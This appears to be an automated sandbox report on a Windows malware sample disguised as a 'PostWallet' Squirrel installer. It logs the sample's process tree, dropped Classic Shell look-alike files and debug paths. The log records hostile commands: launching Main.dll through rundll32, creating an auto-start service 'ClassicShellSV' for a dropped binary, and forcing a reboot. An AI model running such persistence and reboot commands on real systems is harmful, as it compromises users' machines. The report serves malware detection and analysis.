          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: vmwarebase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\shutdown.exeSection loaded: shutdownext.dllJump to behavior
          Source: C:\Windows\System32\shutdown.exeSection loaded: sspicli.dllJump to behavior
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Windows Aero.skin.13.drStatic PE information: Section .rsrc
          Source: Metro.skin7.13.drStatic PE information: Section .rsrc
          Source: Midnight.skin7.13.drStatic PE information: Section .rsrc
          Source: Classic Skin.skin7.13.drStatic PE information: Section .rsrc
          Source: Windows XP Luna.skin.13.drStatic PE information: Section .rsrc
          Source: Metallic.skin7.13.drStatic PE information: Section .rsrc
          Source: Full Glass.skin.13.drStatic PE information: Section .rsrc
          Source: Smoked Glass.skin.13.drStatic PE information: Section .rsrc
          Source: Windows Aero.skin7.13.drStatic PE information: Section .rsrc
          Source: Windows Basic.skin.13.drStatic PE information: Section .rsrc
          Source: Classic Skin.skin.13.drStatic PE information: Section .rsrc
          Source: Metro.skin.13.drStatic PE information: Section .rsrc
          Source: Windows 8.skin.13.drStatic PE information: Section .rsrc
          Source: Windows 8.skin7.13.drStatic PE information: Section .rsrc
          Source: PostWallet-1.0.0-full.nupkgBinary or memory string: y.vBP
          Source: classification engineClassification label: mal80.rans.troj.evad.winEXE@24/60@1/1
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_00ED5EE0 Warning,Warning,strrchr,memset,GetModuleFileNameW,GetLastError,WSCSetApplicationCategory,WSCSetApplicationCategory,Warning,Warning,WSAStartup,WSAGetLastError,Warning,StartServiceCtrlDispatcherW,GetLastError,4_2_00ED5EE0
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_00ED5EE0 Warning,Warning,strrchr,memset,GetModuleFileNameW,GetLastError,WSCSetApplicationCategory,WSCSetApplicationCategory,Warning,Warning,WSAStartup,WSAGetLastError,Warning,StartServiceCtrlDispatcherW,GetLastError,4_2_00ED5EE0
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic ShellJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\PostWalletJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\.squirrel-lock-CAB1F1D4116D18BCC531A7BF44D3609DB185FAD9Jump to behavior
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
          Source: 00023948209303294#U00ac320302282349843984903.exeVirustotal: Detection: 8%
          Source: 00023948209303294#U00ac320302282349843984903.exeString found in binary or memory: DeploymentTool.exe\need dictionaryinvalid literal/length codeinvalid distance codeinvalid block typeinvalid stored block lengthstoo many length or distance symbolsinvalid bit length repeatoversubscribed dynamic bit lengths treeincomplete dynamic bit lengths treeoversubscribed literal/length treeincomplete literal/length treeoversubscribed distance treeincomplete distance treeempty distance tree with lengthsunknown compression methodinvalid window sizeincorrect header checkincorrect data check\..\\..//..//..\UT%s%s%s%s%sOpen Setup LogCloseInstallation has failedSquirrelSQUIRREL_TEMP%s%s\%sUnable to write to %s - IT policies may be restricting access to this folder\SquirrelTemp%s\SquirrelSetup.logDATAUpdate.exe"%s" --install . %sThere was an error while installing the application. Check the setup log for more information and contact the author.Failed to extract installervector<T> too longi
          Source: Update.exeString found in binary or memory: b=|baseUrl={Provides a base URL to prefix the RELEASES file packages with-a=|process-start-args=iArguments that will be used when starting executable-l=|shortcut-locations=
          Source: Update.exeString found in binary or memory: ((?=^[ ]{{0,{0}}}[^ \t\n])|\Z) # Lookahead for non-space at line-start, or end of doc
          Source: Update.exeString found in binary or memory: onError%Downloading file: 1Failed downloading URL: #Downloading url: 1Failed to download url: !squirrel-install3Starting automatic update7Failed to check for updates5Failed to download updates/Failed to apply updates9Failed to set up uninstaller){0} {1}{2} {3} # {4}
          Source: Update.exeString found in binary or memory: Scanning {0}mIgnoring {0} as the target framework is not compatible%Writing {0} to {1}UCouldn't find file for package in {1}: {0}%--squirrel-install%--squirrel-updated'--squirrel-obsolete)--squirrel-uninstall'--squirrel-firstrunAFailed to handle Squirrel events[\StringFileInfo\040904B0\SquirrelAwareVersion)SquirrelAwareVersion;Failed to promote Tray icon:
          Source: Update.exeString found in binary or memory: ..\Update.exegUpdate.exe not found, not a Squirrel-installed app?
          Source: Update.exeString found in binary or memory: update.MNo release to install, running the appIFailed to install package to app dirIFailed to update local releases file;Failed to invoke post-install;Starting fixPinnedExecutables)Fixing up tray icons
          Source: Update.exeString found in binary or memory: -delta.nupkg$iCannot apply combinations of delta and full packagesQCouldn't run Squirrel hook, continuing: ---squirrel-updated {0}---squirrel-install {0}9Squirrel Enabled Apps: [{0}]wNo apps are marked as Squirrel-aware! Going to run them all-Failed to delete key: /--squirrel-obsolete {0}7Couldn't delete directory: QCoudln't run Squirrel hook, continuing: WcleanDeadVersions: checking for version {0}kcleanDeadVersions: exclude current version folder {0}ccleanDeadVersions: exclude new version folder {0}
          Source: unknownProcess created: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
          Source: unknownProcess created: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe "C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe" --rerunningWithoutUAC
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeProcess created: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe" --squirrel-firstrun
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe"
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\shutdown.exe C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
          Source: C:\Windows\System32\shutdown.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeProcess created: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUACJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe" --squirrel-firstrunJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMainJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMainJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMainJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= autoJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\shutdown.exe C:\WINDOWS\system32\shutdown.exe -r -t 1 -fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= autoJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
          Source: VMware Workstation.lnk.3.drLNK file: ..\..\..\..\..\..\Local\PostWallet\FilePosta.exe
          Source: VMware Workstation.lnk0.3.drLNK file: ..\AppData\Local\PostWallet\FilePosta.exe
          Source: C:\Windows\System32\rundll32.exeFile written: C:\Program Files\Classic Shell\StartMenuHelperL10N.iniJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic ShellJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\cacheJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\wvtll.zipJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\wvtll.zip1Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIE_64.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicStartMenu.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicStartMenuDLL.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\PolicyDefinitions.zipJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicExplorer32.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicExplorerSettings.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIE_32.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIEDLL_32.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicShellUpdate.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicShellReadme.rtfJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\HISTORY.txtJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\StartMenuHelperL10N.iniJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\StartMenuL10N.iniJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ExplorerL10N.iniJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\SkinsJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Classic Skin.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Classic Skin.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Full Glass.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Metallic.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Metro.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Metro.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Midnight.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Smoked Glass.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows 8.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows 8.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows Aero.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows Aero.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows Basic.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows XP Luna.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIE_64.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIEDLL_64.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\IE Settings.lnkJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Start Menu Settings.lnkJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Start Screen.lnkJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicShell.chmJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicExplorer64.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\pack01.zipJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\ClassicIE_64.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\MsMpLics.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\OfflineScannerShell.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\EppManifest.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PostWalletJump to behavior
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic file information: File size 6569472 > 1048576
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x619000
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, FilePost?a.exe, 00000004.00000002.3858763537.000000006E391000.00000020.00000001.01000000.00000009.sdmp, FilePost?a.exe, 00000008.00000002.3858762476.000000006E391000.00000020.00000001.01000000.00000009.sdmp, vcruntime140.dll.3.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup64\ClassicExplorer64.pdb source: ClassicExplorer64.dll.13.dr
          Source: Binary string: MpCmdRun.pdbGCTL source: ClassicIE_64.exe.13.dr
          Source: Binary string: netstandard.pdb.mdb source: Update.exe
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicStartMenu\Setup64\ClassicStartMenuDLL.pdb source: ClassicStartMenuDLL.dll.13.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicShellUpdate\Release\ClassicShellUpdate.pdb source: ClassicShellUpdate.exe.13.dr
          Source: Binary string: MpCmdRun.pdb source: ClassicIE_64.exe.13.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup\ClassicIEDLL_32.pdb source: ClassicIEDLL_32.dll.13.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup\ClassicIEDLL_32.pdb, source: ClassicIEDLL_32.dll.13.dr
          Source: Binary string: C:\Users\DeveloperSys\Documents\Embarcadero\Studio\Projects\DLL New Completa\Projeto C++\NovoBaixador\Release\NovoBaixador.pdbO source: FilePost?a.exe, 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorerSettings.pdb source: ClassicExplorerSettings.exe.13.dr
          Source: Binary string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb-- source: Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000000.2034521406.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000008.00000002.3858109335.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000008.00000000.2047188173.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe.3.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorer32.pdb source: ClassicExplorer32.dll.13.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorerSettings.pdb`BXt< source: ClassicExplorerSettings.exe.13.dr
          Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\Setup.pdb source: 00023948209303294#U00ac320302282349843984903.exe
          Source: Binary string: C:\Users\DeveloperSys\Documents\Embarcadero\Studio\Projects\DLL New Completa\Projeto C++\NovoBaixador\Release\NovoBaixador.pdb source: FilePost?a.exe, 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
          Source: Binary string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb source: Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000000.2034521406.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000008.00000002.3858109335.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000008.00000000.2047188173.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe.3.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorer32.pdbL@ source: ClassicExplorer32.dll.13.dr
          Source: Binary string: C:\Users\DeveloperSys\Documents\Embarcadero\Studio\Projects\DLL New Completa\Projeto C++\BasicInformation\x64\Release\BasicSomate.pdb source: ClassicIEDLL_64.dll.13.dr
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
